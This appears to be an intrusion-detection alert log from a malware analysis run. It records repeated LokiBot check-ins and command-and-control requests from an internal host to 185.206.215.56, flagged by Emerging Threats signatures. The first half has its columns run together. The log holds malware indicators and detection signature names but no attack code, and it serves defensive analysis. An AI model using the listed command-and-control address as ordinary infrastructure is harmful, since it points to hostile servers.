                                                                                        01/05/21-19:06:40.714092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.893523TCP2025483ET TROJAN LokiBot Fake 404 Response8049251185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.109834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.281018TCP2025483ET TROJAN LokiBot Fake 404 Response8049252185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.488492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.665959TCP2025483ET TROJAN LokiBot Fake 404 Response8049253185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.875312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.043815TCP2025483ET TROJAN LokiBot Fake 404 Response8049254185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.266645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.432654TCP2025483ET TROJAN LokiBot Fake 404 Response8049255185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.638995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.805691TCP2025483ET TROJAN LokiBot Fake 404 Response8049256185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.011253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.168522TCP2025483ET TROJAN LokiBot Fake 404 Response8049257185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.372296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.526493TCP2025483ET TROJAN LokiBot Fake 404 Response8049258185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.756835TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.913405TCP2025483ET TROJAN LokiBot Fake 404 Response8049259185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.120266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.276026TCP2025483ET TROJAN LokiBot Fake 404 Response8049260185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.485788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.652260TCP2025483ET TROJAN LokiBot Fake 404 Response8049261185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.876902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.053688TCP2025483ET TROJAN LokiBot Fake 404 Response8049262185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.261637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.422623TCP2025483ET TROJAN LokiBot Fake 404 Response8049263185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.633934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.789961TCP2025483ET TROJAN LokiBot Fake 404 Response8049264185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.996354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.162508TCP2025483ET TROJAN LokiBot Fake 404 Response8049265185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.366773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.523351TCP2025483ET TROJAN LokiBot Fake 404 Response8049266185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.730742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.897287TCP2025483ET TROJAN LokiBot Fake 404 Response8049267185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.102635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.257102TCP2025483ET TROJAN LokiBot Fake 404 Response8049268185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.475682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.647987TCP2025483ET TROJAN LokiBot Fake 404 Response8049269185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.867741TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.042229TCP2025483ET TROJAN LokiBot Fake 404 Response8049270185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.254686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.422139TCP2025483ET TROJAN LokiBot Fake 404 Response8049271185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.626007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2025381ET TROJAN LokiBot Checkin4927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.626007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.788675TCP2025483ET TROJAN LokiBot Fake 404 Response8049272185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.009732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2025381ET TROJAN LokiBot Checkin4927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.009732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.170301TCP2025483ET TROJAN LokiBot Fake 404 Response8049273185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.377604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2025381ET TROJAN LokiBot Checkin4927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.377604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.549512TCP2025483ET TROJAN LokiBot Fake 404 Response8049274185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:49.748267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2025381ET TROJAN LokiBot Checkin4927580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:49.748267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927580192.168.2.22185.206.215.56
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/05/21-19:06:49.910769 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49275 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:50.119352 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49276 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.119352 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49276 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.119352 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49276 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.119352 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49276 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.275711 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49276 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:50.486914 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49277 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.486914 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49277 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.486914 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49277 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.486914 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49277 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.662352 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49277 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:50.870071 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49278 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.870071 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49278 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.870071 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49278 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:50.870071 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49278 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.028077 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49278 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:51.234373 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49279 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.234373 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49279 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.234373 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49279 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.234373 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49279 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.393173 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49279 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:51.603753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49280 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.603753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49280 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.603753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49280 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.603753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49280 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.756889 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49280 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:51.974612 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49281 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.974612 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49281 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.974612 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49281 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:51.974612 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49281 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.147882 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49281 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:52.356383 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49282 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.356383 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49282 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.356383 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49282 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.356383 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49282 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.526790 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49282 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:52.728532 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49283 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.728532 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49283 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.728532 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49283 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.728532 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49283 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:52.923052 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49283 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:53.137321 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49284 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.137321 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49284 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.137321 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49284 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.137321 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49284 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.310694 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49284 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:53.527158 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49285 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.527158 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49285 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.527158 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49285 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.527158 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49285 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.705442 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49285 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:53.922499 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49286 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.922499 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49286 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.922499 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49286 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:53.922499 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49286 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.077631 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49286 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:54.285753 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49287 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.285753 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49287 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.285753 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49287 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.285753 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49287 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.453918 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49287 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:54.662267 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49288 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.662267 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49288 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.662267 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49288 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.662267 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49288 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:54.864166 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49288 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:55.070986 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49289 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.070986 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49289 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.070986 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49289 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.070986 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49289 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.223019 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49289 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:55.427131 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49290 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.427131 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49290 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.427131 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49290 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.427131 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49290 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.590567 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49290 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:55.812036 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49291 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.812036 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49291 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.812036 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49291 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.812036 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49291 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:55.997742 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49291 | 185.206.215.56 | 192.168.2.22
01/05/21-19:06:56.213303 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49292 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.213303 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49292 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.213303 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49292 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.213303 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49292 | 80 | 192.168.2.22 | 185.206.215.56
01/05/21-19:06:56.397187 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49292 | 185.206.215.56 | 192.168.2.22
